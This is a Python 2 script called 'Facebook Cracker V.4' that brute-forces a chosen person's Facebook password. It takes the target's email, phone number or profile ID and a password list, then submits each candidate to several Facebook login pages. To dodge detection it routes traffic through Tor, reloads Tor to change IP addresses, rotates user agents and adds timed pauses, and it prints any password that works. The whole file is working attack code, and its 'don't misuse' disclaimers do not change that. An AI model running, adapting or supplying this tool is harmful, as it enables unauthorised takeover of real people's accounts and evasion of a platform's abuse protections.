#!/usr/bin/python 2.7.11
#
#
import sys
import random
import mechanize
import cookielib
import time
import socks
import socket
import os
  


#Colors
#########################
Red =    '\033[0;31;48m'#
Blue =   '\033[0;34;48m'#
Green =  '\033[0;32;48m'#
Yellow = '\033[0;33;48m'#
White =  '\033[0;37;48m'#
#########################
os.system("clear")
print "#######################################################"
print "#                       V.4                           #"
print "# Note: - This Tool Can Only Guess A Max Of 12        #"
print "# Don't Use For The Wrong Purpose                     #"
print "# Hit CTRL+Z to Exit The Script                       #"
print "#######################################################\n\n"

if os.getuid() != 0:
	os.system("clear")
	print 'Please Run This Script With Root Access';time.sleep(0.7);sys.exit(1) 

try:
	email = str(raw_input("Enter |Email| |Phone number| |Profile ID number| |Username| : "));time.sleep(0.7)
	if len(email) is 0:
		os.system('clear');sys.exit()
	passwordlist = str(raw_input("\nEnter Password List: "))
	if os.path.exists(passwordlist) is False:
		os.system("clear");sys.exit()
except KeyboardInterrupt:
	os.system("clear")
	print "[*] Exiting program .. ";time.sleep(0.9);os.system("service tor stop")
	sys.exit(1)
	
  
useragents = [('Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36',
	        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36',
	        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36',
		'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36')]
  
  
Attempt = 1;Attempt2=1
Tries = 1
X = 1
Y = 1
login = 'https://beta.facebook.com/login.php?login_attempt=1&lwv=100'
login2 = "https://beta.facebook.com/login.php"

def GHT():
	os.system("clear")
        print ' %s+%s==================================================%s+%s'        %(Green,Blue,Green,White)
        print ' %s|%s.............%sFacebook Cracker V.4%s.................%s|%s'    %(Green,Blue,Green,Blue,Green,White)
        print ' %s+%s--------------------------------------------------%s+%s'        %(Green,Yellow,Green,White)
        print ' %s|%s# %sOriginal Author%s:  %sMauritania Attacker           %s|%s'  %(Green,Blue,Red,Green,Yellow,Green,White)
        print ' %s|%s# %sOriganal Contact%s: %swww.fb.com/mauritanie.forever %s|%s'  %(Green,Blue,Red,Green,Yellow,Green,White)
        print ' %s|%s# %sOriginal Date%s: %s02/04/2013                       %s|%s'  %(Green,Blue,Red,Green,Yellow,Green,White)
	print ' %s|%s  						    |%s'             %(Green,Green,White)
	print ' %s|%s# %sRevised By%s: %sEthical H4CK3R                      %s|%s'  %(Green,Blue,Red,Green,Yellow,Green,White)
	print ' %s|%s# %sReviser Youtube Channel%s: %shttps://goo.gl/UVqSAs  %s|%s'  %(Green,Blue,Red,Green,Yellow,Green,White)
	print ' %s|%s# %sNew Date%s: %s06/11/2016                            %s|%s'  %(Green,Blue,Red,Green,Yellow,Green,White)
        print ' %s|%s                				    |%s'             %(Green,Green,White)
        print ' %s|%s            					    |%s'     %(Green,Green,White) 
        print ' %s|%s                                                  |%s'          %(Green,Green,White)
        print ' %s|%s                                                  |%s'          %(Green,Green,White)
        print ' %s|%s[%s*%s]%s  I Take No Responsibilities For The           %s|%s'  %(Green,Yellow,Red,Yellow,Blue,Green,White)
        print ' %s|%s     Misuse Of This Script, %sUse At Your Own Risk  %s|%s'      %(Green,Blue,Red,Green,White)
        print ' %s+%s--------------------------------------------------%s+%s'        %(Green,Yellow,Green,White)
        print ' %s|%s.............%sFacebook Cracker V.4%s.................%s|%s'    %(Green,Blue,Green,Blue,Green,White)
        print ' %s+%s==================================================%s+%s'        %(Green,Blue,Green,White)

x=0

def attack(password,email):
     global x,X,Y
     global Attempt,Tries,Attempt2
     Email = email
     try:
	os.system("clear")
	GHT()
	print '\n\n\n\n\n'
	length = len(passwords)
	left = int(length-Tries)
	
	if left == -1:
		left+=1
	if Tries > length:
		Tries -=1 
	print "\n\n"
	print "[*] Loaded : %d passwords" %length
	print "[*] Brute Forcing Into: %s" % (email)
	print "[*] Attempt #: %d"%Tries
	print "[*] To Go: #: %d"%left
     except KeyboardInterrupt:
	os.system("clear")
	print "[*] Exiting program ..";time.sleep(0.9);os.system("service tor stop")
	sys.exit(1)
  
     try:
	     def create_connection(address, timeout=None, source_address=None):
			    sock = socks.socksocket()
			    sock.connect(address)
			    return sock

	     socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9050)
     except:
	     def create_connection(address, timeout=None, source_address=None):
			    sock = socks.socksocket()
			    sock.connect(address)
			    return sock

	     socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS4, "127.0.0.1", 9050)

     # patch the socket module
     socket.socket = socks.socksocket
     socket.create_connection = create_connection
     
     sys.stdout.write("[*] Trying: %s \n" % password)
     sys.stdout.flush();
     
     if x < 2:
	     while True:
		try:
		     pass
		     br.addheaders = [('User-agent', random.choice(useragents))]
		     Site = br.open(login)
		     br.select_form(nr=0)
		     ##Facebook
		     br.form['email'] = email
		     br.form['pass'] = password
		     Enter = br.submit()
		     log = br.geturl()
		  
	             
		     if  'login' not in log:
				Found(password,email,Tries)
		     else:
			Delay = random.randint(3,5);
		     x+=1
		     if x is 2:
			break
		except:
			Time2(30);X+=1;
	
			if X is 3:
				X=0;os.system("service tor reload");time.sleep(2);check()
			else:
				attack(password,email)
	     Attempt+=1;time.sleep(Delay);Attempt2+=1;Tries+=1
	    
     if int(Tries-1) is 4:
	os.system('service tor reload');time.sleep(2)
     if x >= 3:
	     pass
	     try:
		     Url = 'https://beta.facebook.com/login.php?login_attempt=1&lwv=100'
		     br.addheaders = [('User-agent', random.choice(useragents))]
		     Site = br.open(Url)
		     br.select_form(nr=0)
		     ##Facebook
		     br.form['email'] = Email
		     br.form['pass'] = password
		     Enter = br.submit()
		     log = br.geturl()
		    
			
		     if 'login' not in log:
			Found(password,email,Tries)
		     else:
			Delay = random.randint(3,5);
			
	     except:
			    try:
			             os.system('service tor reload');time.sleep(2)
				     Url = 'https://www.facebook.com/login.php?login_attempt=1&lwv=100'
				     br.addheaders = [('User-agent', random.choice(useragents))]
				     Site = br.open(Url)
				     br.select_form(nr=0)
				     ##Facebook
				     br.form['email'] = Email
				     br.form['pass'] = password
				     Enter = br.submit()
				     log = br.geturl()
				    
				     if 'login' not in log:
					Found(password,email,Tries)
				     else:
					Delay = random.randint(3,5);
					
			    except:
				try:
					     os.system('service tor reload');time.sleep(4) 
					     Url = 'https://m.facebook.com/login.php'
					     br.addheaders = [('User-agent', random.choice(useragents))]
					     Site = br.open(Url)
					     br.select_form(nr=0)
					     ##Facebook
					     br.form['email'] = Email
					     br.form['pass'] = password
					     Enter = br.submit()
					     log = br.geturl()
					     
					     if 'login' not in log:
						Found(password,email,Tries)
					     else:
						Delay = random.randint(3,5);
						
				except:
					Time2(30);Y+=1;
	
					if Y is 3:
						Y=0;os.system("service tor reload");time.sleep(2);check()
					else:
						attack(password,email)
             Attempt+=1;time.sleep(Delay);Attempt2+=1;Tries+=1

     if x != 3:
	x+=1
     
     if Attempt == 7:
     	Time();Attempt = 1;
   
     if Attempt2 == 10:
		Time();Attempt2=1


def Time2(sleep):
	#Sleep = sleep
	Sleep = 5
	global Tries
	os.system('service tor reload')
	Time = Sleep
	while Time != 0:
	    os.system("clear");
	    GHT()
	    print '\n\n\n\n\n\n';print '\n\n\n[*] Halt Time: %d Secs' %Sleep
	    print '[*] BruteForce Resumes In: %d Secs' %Time;
	    print '[*] Attempt #: %d' %Tries;time.sleep(1)
	    Time-=1

def Time():
	#Sleep = 40
	Sleep = 5
	global Tries
	os.system('service tor reload')
	#Time = Sleep+Tries+10
	Time = Sleep
	while Time != 0:
	    os.system("clear");
	    GHT()
	    print '\n\n\n\n\n\n';print '\n\n\n[*] Halt Time: %d Secs' %Sleep #%int(Sleep+Tries+10)
	    print '[*] BruteForce Resumes In: %d Secs' %Time;
	    print '[*] Attempt #: %d' %Tries;time.sleep(1)
	    Time-=1
    
    
def Found(password,email,Tries):
	os.system("clear");time.sleep(0.4);GHT();print '\n\n\n\n\n\n\n'
	print '%s[%s!%s] %sPress %sCtrl%s+%sZ %sTo %sExit%s\n\n\n' %(Yellow,Red,Yellow,Blue,Yellow,Red,Yellow,Blue,Red,White)
	print "%s[%s+%s] %sPassword Found " %(Yellow,Red,Yellow,Blue)
	print "%s[%s+%s]%s Attempt %s#: %s%d" %(Yellow,Red,Yellow,Red,Blue,Red,Tries) 
	print "%s[%s+%s]%s Login: %s[%s %s %s]" %(Yellow,Red,Yellow,Red,Yellow,Blue,email,Yellow)
	print "%s[%s+%s]%s Password: %s[%s %s %s]%s\n\n" %(Yellow,Red,Yellow,Red,Yellow,Blue,password,Yellow,White)
	os.system("service tor stop")
	while True:
		pass
def search():
    global password
    for password in passwords:
	attack(password.replace("\n",""),email)
  
  
T = 0 
def check():
    global T
    if T is 0:
	    if not os.path.exists('/usr/bin/tor'):
		os.system("clear");print 'Installing: Tor';time.sleep(1);os.system("clear")
		os.system("apt-get install tor -y")
		check()
	    os.system("service tor start");time.sleep(2);T+=1
    global br
    global passwords
    try:
       br = mechanize.Browser()
       cj = cookielib.LWPCookieJar()
       br.set_handle_robots(False)
       br.set_handle_equiv(True)
       br.set_handle_referer(True)
       br.set_handle_redirect(True)
       br.set_cookiejar(cj)
       br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
    except KeyboardInterrupt:
       os.system("clear")
       print "[*] Exiting program ..";time.sleep(0.9);os.system("service tor stop")
       sys.exit(1)
    try:
       list = open(passwordlist, "r")
       passwords = list.readlines()
       k = 0
       while k < len(passwords):
	  passwords[k] = passwords[k].strip()
	  k += 1
    except IOError:
	print "\n [*] Error: check your password list path \n";os.system("service tor stop")
	sys.exit(1)
    except KeyboardInterrupt:
	os.system("clear")
	print "[*] Exiting program ..";time.sleep(0.9);os.system("service tor stop")
	sys.exit(1)
    try:
	search()
	attack(password,email)
    except KeyboardInterrupt:
	os.system("clear")
	print "[*] Exiting program ..";time.sleep(0.9);os.system("service tor stop")
	sys.exit(1)

  
if __name__ == '__main__':
    check()

	
